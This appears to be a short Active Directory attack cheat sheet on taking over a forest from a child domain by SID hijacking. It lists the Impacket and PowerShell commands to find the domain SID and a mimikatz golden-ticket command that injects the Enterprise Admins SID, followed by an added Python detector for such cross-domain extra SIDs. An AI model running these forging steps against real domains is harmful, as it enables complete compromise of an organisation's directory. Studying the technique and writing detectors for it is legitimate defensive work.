# Child Domain to Forest Compromise - SID Hijacking

Most trees are linked with two-way trust relationships to allow for sharing of resources.
By default, the first domain created is the Forest Root.

**Requirements**:
- KRBTGT Hash
- Find the SID of the domain
```powershell
$ Convert-NameToSid target.domain.com\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502

# with Impacket
lookupsid.py domain/user:password@10.10.10.10
```
- Replace 502 with 519 to represent Enterprise Admins
- Create golden ticket and attack parent domain.
```powershell
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
```
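
The ticket built in the last step carries a privileged SID of another domain in its extra SIDs, which is what a defender can look for. The check below is an added example, not part of the original page: the function names and the sample list are constructed, the parent-domain SID is a placeholder, and the input is assumed to be the SID list already decoded from a ticket's PAC.

```python
"""Flag cross-domain privileged SIDs in a ticket's extra-SID list (illustrative)."""
import re

# Well-known RIDs of groups that are privileged across a domain or forest.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

_SID_RE = re.compile(r"^S-1-5-21-(\d+)-(\d+)-(\d+)-(\d+)$")


def split_sid(sid):
    """Return (domain_sid, rid) for a domain-relative SID, or None otherwise."""
    m = _SID_RE.match(sid.strip())
    if not m:
        return None
    a, b, c, rid = m.groups()
    return f"S-1-5-21-{a}-{b}-{c}", int(rid)


def suspicious_extra_sids(ticket_domain_sid, extra_sids):
    """List extra SIDs asserting a privileged group of a *different* domain.

    A hit is a lead, not proof: a child-domain account that really is a
    member of the group must be ruled out against the directory.
    """
    findings = []
    for sid in extra_sids:
        parsed = split_sid(sid)
        if parsed is None:
            continue  # not a domain-relative SID (e.g. S-1-18-1)
        domain_sid, rid = parsed
        if domain_sid != ticket_domain_sid and rid in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[rid]))
    return findings


# Constructed sample: child-domain SID as shown on the page, parent SID made up.
CHILD = "S-1-5-21-2941561648-383941485-1389968811"
PARENT = "S-1-5-21-1111111111-2222222222-3333333333"  # placeholder
SAMPLE_EXTRA_SIDS = [f"{CHILD}-513", f"{PARENT}-519", "S-1-18-1"]

if __name__ == "__main__":
    for sid, group in suspicious_extra_sids(CHILD, SAMPLE_EXTRA_SIDS):
        print(f"ALERT: extra SID {sid} asserts {group} outside {CHILD}")
```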